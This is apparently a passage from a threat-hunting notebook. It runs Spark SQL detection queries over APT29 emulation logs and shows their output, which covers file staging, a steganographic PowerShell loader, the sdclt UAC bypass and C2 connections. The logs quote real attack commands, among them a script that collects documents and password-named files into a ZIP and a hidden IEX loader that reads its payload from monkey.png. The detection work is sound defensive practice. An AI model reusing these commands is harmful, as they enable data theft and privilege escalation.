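# looks like mojibake ("â€"); confirm it still matches U+202E (RTLO) as intended.
query = '''
SELECT b.ScriptBlockText
FROM apt29Host a
INNER JOIN (
  SELECT d.NewProcessId, d.ProcessId, c.ScriptBlockText
  FROM apt29Host c
  INNER JOIN (
      SELECT split(NewProcessId, '0x')[1] as NewProcessId, ProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
      ) d
  ON LOWER(hex(c.ExecutionProcessID)) = d.NewProcessId
  WHERE c.Channel = "Microsoft-Windows-PowerShell/Operational"
          AND c.EventID = 4104
          AND LOWER(c.ScriptBlockText) LIKE "%compress-archive%"
) b
ON a.NewProcessId = b.ProcessId
WHERE LOWER(a.Channel) = "security"
          AND a.EventID = 4688
          AND LOWER(a.ParentProcessName) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'

'''
df = spark.sql(query)
df.show(100, truncate=False, vertical=True)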
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 ScriptBlockText | $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force 

2.A.5. Data Staged

Procedure: Staged files for exfiltration into ZIP (Draft.zip) using PowerShell

Criteria: powershell.exe creating the file draft.zip

Detection Type:Telemetry(Correlated)

Query ID:76154CEC-1E01-4D3A-B9ED-C78978597C2B

# Query 76154CEC: list files ending in "zip" created (Sysmon EventID 11) by
# the PowerShell process whose 4104 script block contained Compress-Archive.
# The 4104 event is tied to the process through ExecutionProcessID = Sysmon 1
# ProcessId, and the file-create event through the shared ProcessGuid.
# The "%zip" suffix match is broad: in the captured output it returns
# working.zip alongside Draft.Zip.
query = '''
SELECT TargetFilename
FROM apt29Host a
INNER JOIN (
    SELECT d.ProcessGuid, d.ProcessId
    FROM apt29Host c
    INNER JOIN (
        SELECT ProcessGuid, ProcessId
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
        ) d
    ON c.ExecutionProcessID = d.ProcessId
    WHERE c.Channel = "Microsoft-Windows-PowerShell/Operational"
            AND c.EventID = 4104
            AND LOWER(c.ScriptBlockText) LIKE "%compress-archive%"
) b
ON a.ProcessGuid = b.ProcessGuid
WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
            AND a.EventID = 11
            AND LOWER(a.TargetFilename) LIKE "%zip"

'''
df = spark.sql(query)
df.show(100, truncate=False, vertical=True)
-RECORD 0------------------------------------------------------
 TargetFilename | C:\Users\pbeesly\AppData\Roaming\Draft.Zip   
-RECORD 1------------------------------------------------------
 TargetFilename | C:\Users\pbeesly\AppData\Roaming\working.zip 

2.B.1. Exfiltration Over Command and Control Channel

Procedure: Read and downloaded ZIP (Draft.zip) over C2 channel (192.168.0.5 over TCP port 1234)

Criteria: The rcs.3aka3.doc process reading the file draft.zip while connected to the C2 channel

Detection Type:None(None)

3.A.1. Remote File Copy

Procedure: Dropped stage 2 payload (monkey.png) to disk

Criteria: The rcs.3aka3.doc process creating the file monkey.png

Detection Type:Telemetry(Correlated)

Query ID:64249901-ADF8-4E5D-8BB4-70540A45E26C

# Query 64249901: return the Sysmon file-create event (EventID 11) for
# monkey.png, but only when the creating process's own Sysmon 1 event (joined
# on ProcessGuid) has an Image containing a Unicode bidi-control character.
# In the captured output that image is the RTLO-renamed "‮cod.3aka3.scr".
#
# NOTE(review): the RLIKE alternation mixes raw bidi characters with what
# looks like mojibake ("â€"); confirm it still matches U+202E (RTLO) as intended.
query = '''
SELECT b.Message
FROM apt29Host a
INNER JOIN (
    SELECT ProcessGuid, Message
    FROM apt29Host
    WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
        AND EventID = 11
        AND LOWER(TargetFilename) LIKE '%monkey.png'
) b
ON a.ProcessGuid = b.ProcessGuid
WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
  AND a.EventID = 1
  AND LOWER(a.Image) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'

'''
df = spark.sql(query)
df.show(100, truncate=False, vertical=True)
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | File created:
RuleName: -
UtcTime: 2020-05-02 02:57:00.933
ProcessGuid: {47ab858c-e13c-5eac-a903-000000000400}
ProcessId: 8524
Image: C:\ProgramData\victim\‮cod.3aka3.scr
TargetFilename: C:\Users\pbeesly\Downloads\monkey.png
CreationUtcTime: 2020-05-02 02:57:00.933 

3.A.2. Obfuscated Files or Information

Procedure: Embedded PowerShell payload in monkey.png using steganography

Criteria: Evidence that a PowerShell payload was within monkey.png

Detection Type:Telemetry(None)

Query ID:0F10E1D1-EDF8-4B9F-B879-3651598D528A

# Query 0F10E1D1 (Sysmon variant): show the Image and CommandLine of the
# process that executed a script block referencing monkey.png, by joining the
# 4104 event's ExecutionProcessID to the Sysmon 1 ProcessId. The extra
# Parent*/ProcessGuid columns are selected in the subquery but not projected.
# The captured output shows the command line reading pixel data from the
# image and passing the decoded bytes to IEX.
query = '''
SELECT d.Image, d.CommandLine, c.ScriptBlockText
FROM apt29Host c
INNER JOIN (
    SELECT ParentProcessGuid, ProcessGuid, ProcessId, ParentImage, Image, ParentCommandLine, CommandLine
    FROM apt29Host
    WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
        AND EventID = 1
    ) d
ON c.ExecutionProcessID = d.ProcessId
WHERE c.Channel = "Microsoft-Windows-PowerShell/Operational"
    AND c.EventID = 4104
    AND LOWER(c.ScriptBlockText) LIKE "%monkey.png%"

'''
df = spark.sql(query)
df.show(100, truncate=False, vertical=True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Image           | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe                                                                                                                                                                                                                                                                                                                                                                     
 CommandLine     | "PowerShell.exe" -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName 'System.Drawing'; $g=a System.Drawing.Bitmap('C:\Users\pbeesly\Downloads\monkey.png');$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))" 
 ScriptBlockText | sal a New-Object;Add-Type -AssemblyName 'System.Drawing'; $g=a System.Drawing.Bitmap('C:\Users\pbeesly\Downloads\monkey.png');$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))                                                               

Query ID:94F9B4F2-1C52-4A47-BF47-C786513A05AA

# Query 94F9B4F2 (Security variant): same correlation as the Sysmon version,
# using the 4688 NewProcessName/CommandLine instead. The join key is the
# PowerShell ExecutionProcessID rendered as hex and lower-cased, because 4688
# logs NewProcessId in lower case ("0x131c") and hex() emits upper case;
# split(..., '0x')[1] strips the prefix from the logged value.
query = '''
SELECT d.NewProcessName, d.CommandLine, c.ScriptBlockText
FROM apt29Host c
INNER JOIN (
    SELECT NewProcessName, CommandLine, split(NewProcessId, '0x')[1] as NewProcessId
    FROM apt29Host
    WHERE LOWER(Channel) = "security"
        AND EventID = 4688
    ) d
ON LOWER(hex(c.ExecutionProcessID)) = d.NewProcessId
WHERE c.Channel = "Microsoft-Windows-PowerShell/Operational"
    AND c.EventID = 4104
    AND LOWER(c.ScriptBlockText) LIKE "%monkey.png%"

'''
df = spark.sql(query)
df.show(100, truncate=False, vertical=True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 NewProcessName  | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe                                                                                                                                                                                                                                                                                                                                                                     
 CommandLine     | "PowerShell.exe" -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName 'System.Drawing'; $g=a System.Drawing.Bitmap('C:\Users\pbeesly\Downloads\monkey.png');$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))" 
 ScriptBlockText | sal a New-Object;Add-Type -AssemblyName 'System.Drawing'; $g=a System.Drawing.Bitmap('C:\Users\pbeesly\Downloads\monkey.png');$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))                                                               

3.B.1. Component Object Model Hijacking

Procedure: Modified the Registry to enable COM hijacking of sdclt.exe using PowerShell

Criteria: Addition of the DelegateExecute subkey in HKCU\Software\Classes\Folder\shell\open\command

Detection Type:Telemetry(None)

Query ID:04EB334D-A304-40D9-B177-0BB6E95FC23E

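# Query 04EB334D: Sysmon registry-value-set events (EventID 13) whose
# TargetObject ends in ...\Folder\shell\open\command\DelegateExecute, the
# key the Procedure text describes for the sdclt.exe COM hijack.
#
# Each path separator is written with eight backslashes because the literal
# is unescaped twice before reaching the regex engine: once by Python (this is
# not a raw string) and again by the Spark SQL parser. The original had seven
# before "delegateexecute", which only produced the same value because "\d"
# is an invalid Python escape that the interpreter preserves (with a
# DeprecationWarning); using eight throughout removes that dependency.
query = '''
SELECT Message
FROM apt29Host
WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
    AND EventID = 13
    AND LOWER(TargetObject) RLIKE '.*\\\\\\\\folder\\\\\\\\shell\\\\\\\\open\\\\\\\\command\\\\\\\\delegateexecute.*'

'''
df = spark.sql(query)
df.show(100, truncate=False, vertical=True)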
-RECORD 0------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 02:58:30.649
ProcessGuid: {47ab858c-e18b-5eac-b103-000000000400}
ProcessId: 6868
Image: C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107_Classes\Folder\shell\open\command\DelegateExecute
Details: (Empty) 

3.B.2. Bypass User Account Control

Procedure: Executed elevated PowerShell payload

Criteria: High integrity powershell.exe spawning from control.exe (spawned from sdclt.exe)

Detection Type:Technique(None)

Query ID:7a4a8c7e-4238-4db3-a90d-34e9f3c6e60f

# Query 7a4a8c7e: Sysmon process-creation events (EventID 1) whose parent image
# contains "sdclt.exe". Note the pattern has a trailing wildcard, unlike the
# "%sdclt.exe" suffix match used by the Security-channel query below; in the
# captured output it returns control.exe spawned by sdclt.exe.
query = '''
SELECT Message
FROM apt29Host
WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
    AND EventID = 1
    AND LOWER(ParentImage) LIKE "%sdclt.exe%"

'''
df = spark.sql(query)
df.show(100, truncate=False, vertical=True)
-RECORD 0------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 02:58:43.212
ProcessGuid: {47ab858c-e1e3-5eac-b603-000000000400}
ProcessId: 4892
Image: C:\Windows\System32\control.exe
FileVersion: 10.0.18362.1 (WinBuild.160101.0800)
Description: Windows Control Panel
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: CONTROL.EXE
CommandLine: "C:\Windows\System32\control.exe"  /name Microsoft.BackupAndRestoreCenter
CurrentDirectory: C:\windows\system32\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-812e-370000000000}
LogonId: 0x372E81
TerminalSessionId: 2
IntegrityLevel: High
Hashes: SHA1=D054A1D1E0BECCA5EEF751CF616ECB811CFABECE,MD5=62D970D8B60F75C12D21C740F2D8A5DA,SHA256=D6E21DA3BE0701162A36F8C9F94E616B1A0C5FD4CC1B52EFD81959CB257957C1,IMPHASH=7A8EC2645C24D85DE8216D63022623C0
ParentProcessGuid: {47ab858c-e1e3-5eac-b503-000000000400}
ParentProcessId: 6492
ParentImage: C:\Windows\System32\sdclt.exe
ParentCommandLine: "C:\windows\system32\sdclt.exe"  

Query ID:d52fe669-55da-49e1-a76b-89297c66fa02

# Query d52fe669: Security 4688 events whose creator (parent) process name
# ends in "sdclt.exe". The 4688 message carries the Token Elevation Type and
# Mandatory Label fields that later queries in this notebook filter on.
query = '''
SELECT Message
FROM apt29Host
WHERE LOWER(Channel) = "security"
  AND EventID = 4688
  AND LOWER(ParentProcessName) LIKE "%sdclt.exe"

'''
df = spark.sql(query)
df.show(100, truncate=False, vertical=True)
-RECORD 0---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x372E81

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x131c
	New Process Name:	C:\Windows\System32\control.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		S-1-16-12288
	Creator Process ID:	0x195c
	Creator Process Name:	C:\Windows\System32\sdclt.exe
	Process Command Line:	"C:\Windows\System32\control.exe"  /name Microsoft.BackupAndRestoreCenter

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 

Detection Type:Telemetry(None)

Query ID:F7E315BA-6A66-44D8-ABB3-3FBB4AA8F80A

# Query F7E315BA: Sysmon process-creation events (EventID 1) for sdclt.exe
# itself that already carry IntegrityLevel "High". In the captured output the
# elevated sdclt.exe was launched from cmd.exe.
query = '''
SELECT Message
FROM apt29Host
WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
    AND EventID = 1
    AND LOWER(Image) LIKE "%sdclt.exe"
    AND IntegrityLevel = "High"

'''
df = spark.sql(query)
df.show(100, truncate=False, vertical=True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 02:58:43.008
ProcessGuid: {47ab858c-e1e3-5eac-b503-000000000400}
ProcessId: 6492
Image: C:\Windows\System32\sdclt.exe
FileVersion: 10.0.18362.657 (WinBuild.160101.0800)
Description: Microsoft® Windows Backup
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: sdclt.exe
CommandLine: "C:\windows\system32\sdclt.exe" 
CurrentDirectory: C:\windows\system32\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-812e-370000000000}
LogonId: 0x372E81
TerminalSessionId: 2
IntegrityLevel: High
Hashes: SHA1=4D64682188DB0A028EC382975D8872CF1B61EBE4,MD5=F96744B10792C70426608E670C0E39DB,SHA256=DAFB903D3AA945C4AC01011E38F3E232D6BE8B7F9B66B7C3CCB1A1ECFC1B7A90,IMPHASH=B3A705D69AAAAF7164324CD5E6AF8E0D
ParentProcessGuid: {47ab858c-e188-5eac-b003-000000000400}
ParentProcessId: 3480
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "C:\windows\system32\cmd.exe" 

Query ID:6C8780E9-E6AF-4210-8EA0-72E9017CEE7D

# Query 6C8780E9: two-hop Sysmon process chain. Subquery b selects control.exe
# instances whose parent is sdclt.exe; the outer query returns any
# high-integrity process whose ParentProcessGuid is one of those control.exe
# ProcessGuids. In the captured output that child is powershell.exe.
query = '''
SELECT Message
FROM apt29Host a
INNER JOIN (
    SELECT ProcessGuid
    FROM apt29Host
    WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
        AND EventID = 1
        AND LOWER(Image) LIKE "%control.exe"
        AND LOWER(ParentImage) LIKE "%sdclt.exe"
) b
ON a.ParentProcessGuid = b.ProcessGuid
WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND a.EventID = 1
    AND a.IntegrityLevel = "High"

'''
df = spark.sql(query)
df.show(100, truncate=False, vertical=True)
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 02:58:44.325
ProcessGuid: {47ab858c-e1e4-5eac-b803-000000000400}
ProcessId: 2976
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.18362.1 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "PowerShell.exe" -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName 'System.Drawing'; $g=a System.Drawing.Bitmap('C:\Users\pbeesly\Downloads\monkey.png');$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))"
CurrentDirectory: C:\windows\system32\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-812e-370000000000}
LogonId: 0x372E81
TerminalSessionId: 2
IntegrityLevel: High
Hashes: SHA1=36C5D12033B2EAF251BAE61C00690FFB17FDDC87,MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481
ParentProcessGuid: {47ab858c-e1e3-5eac-b603-000000000400}
ParentProcessId: 4892
ParentImage: C:\Windows\System32\control.exe
ParentCommandLine: "C:\Windows\System32\control.exe"  /name Microsoft.BackupAndRestoreCenter 

Query ID:C36B49B5-DF58-4A34-9FE9-56189B9DEFEA

# Query C36B49B5: Security 4688 events for sdclt.exe created with a High
# mandatory label (S-1-16-12288, the label Sysmon reports as IntegrityLevel
# "High" for the same process) and token elevation type "%%1937".
# NOTE(review): %%1937 is the resource string Windows renders as an elevated
# (type 2) token in the 4688 message text; confirm against the message table
# reproduced in the output above before relying on it.
query = '''
SELECT Message
FROM apt29Host
WHERE LOWER(Channel) = "security"
  AND EventID = 4688
  AND LOWER(NewProcessName) LIKE "%sdclt.exe"
  AND MandatoryLabel = "S-1-16-12288"
  AND TokenElevationType = "%%1937"

'''
df = spark.sql(query)
df.show(100, truncate=False, vertical=True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-18
	Account Name:		SCRANTON$
	Account Domain:		DMEVALS
	Logon ID:		0x3E7

Target Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x372E81

Process Information:
	New Process ID:		0x195c
	New Process Name:	C:\Windows\System32\sdclt.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		S-1-16-12288
	Creator Process ID:	0xd98
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	"C:\windows\system32\sdclt.exe" 

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 

Query ID:EE34D18C-0549-4AFB-8B98-01160B0C9094

# Query EE34D18C (Security counterpart of the Sysmon two-hop query): subquery
# b selects the NewProcessId of control.exe instances spawned by sdclt.exe;
# the outer query returns 4688 events whose creator ProcessId matches, and
# which carry the High mandatory label and elevation type "%%1937". Both
# sides of the join are the "0x..." strings as logged, so no hex conversion
# is needed here.
query = '''
SELECT Message
FROM apt29Host a
INNER JOIN (
    SELECT NewProcessId
    FROM apt29Host
    WHERE LOWER(Channel) = "security"
        AND EventID = 4688
        AND LOWER(NewProcessName) LIKE "%control.exe"
        AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
) b
ON a.ProcessId = b.NewProcessId
WHERE LOWER(a.Channel) = "security"
    AND a.EventID = 4688
    AND a.MandatoryLabel = "S-1-16-12288"
    AND a.TokenElevationType = "%%1937"

'''
df = spark.sql(query)
df.show(100, truncate=False, vertical=True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x372E81

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xba0
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		S-1-16-12288
	Creator Process ID:	0x131c
	Creator Process Name:	C:\Windows\System32\control.exe
	Process Command Line:	"PowerShell.exe" -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName 'System.Drawing'; $g=a System.Drawing.Bitmap('C:\Users\pbeesly\Downloads\monkey.png');$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 

3.B.3. Commonly Used Port

Procedure: Established C2 channel (192.168.0.5) via PowerShell payload over TCP port 443

Criteria: Established network channel over port 443

Detection Type:Telemetry(Correlated)

Query ID:E209D0C5-5A2B-4AEC-92B0-1510165B8EC7

# 3.B.3 (Sysmon): network connections (EventID 3) made by the High-integrity
# process that the sdclt.exe -> control.exe chain spawned (the 4688 record above
# this cell shows that child to be powershell.exe with MandatoryLabel
# S-1-16-12288 and TokenElevationType %%1937).
# Lineage is rebuilt purely from Sysmon ProcessGuid / ParentProcessGuid:
#   b: EventID 1, control.exe whose ParentImage is sdclt.exe
#   a: EventID 1, children of that control.exe with IntegrityLevel = High
#   d: EventID 3 rows whose ProcessGuid is one of those children
# The query does not filter on DestinationPort, so it returns every outbound
# connection of that process, not only the port-443 channel named in the
# criteria; on this dataset both returned rows go to 192.168.0.5:443.
# NOTE(review): add `AND d.DestinationPort = 443` if the intent is to pin the
# stated criteria rather than to list all connections of the process.
df = spark.sql(
'''
SELECT Message
FROM apt29Host d
INNER JOIN (
    SELECT a.ProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
) c
ON d.ProcessGuid = c.ProcessGuid
WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 3

'''
)
# 100 rows is well above the handful of correlated hits expected here.
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Network connection detected:
RuleName: -
UtcTime: 2020-05-02 02:58:46.099
ProcessGuid: {47ab858c-e1e4-5eac-b803-000000000400}
ProcessId: 2976
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
User: DMEVALS\pbeesly
Protocol: tcp
Initiated: true
SourceIsIpv6: false
SourceIp: 10.0.1.4
SourceHostname: -
SourcePort: 59846
SourcePortName: -
DestinationIsIpv6: false
DestinationIp: 192.168.0.5
DestinationHostname: -
DestinationPort: 443
DestinationPortName: - 
-RECORD 1-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Network connection detected:
RuleName: -
UtcTime: 2020-05-02 02:58:45.688
ProcessGuid: {47ab858c-e1e4-5eac-b803-000000000400}
ProcessId: 2976
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
User: DMEVALS\pbeesly
Protocol: tcp
Initiated: true
SourceIsIpv6: false
SourceIp: 10.0.1.4
SourceHostname: -
SourcePort: 59845
SourcePortName: -
DestinationIsIpv6: false
DestinationIp: 192.168.0.5
DestinationHostname: -
DestinationPort: 443
DestinationPortName: - 

Query ID:2E9B9ADC-2426-419F-8E6E-2D9338384F80

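# 3.B.3 (Security log): same lineage as the Sysmon cell above, rebuilt from
# 4688 process-creation events and joined to 5156 (WFP permitted a connection).
#   b: 4688 where control.exe was created by sdclt.exe            -> NewProcessId
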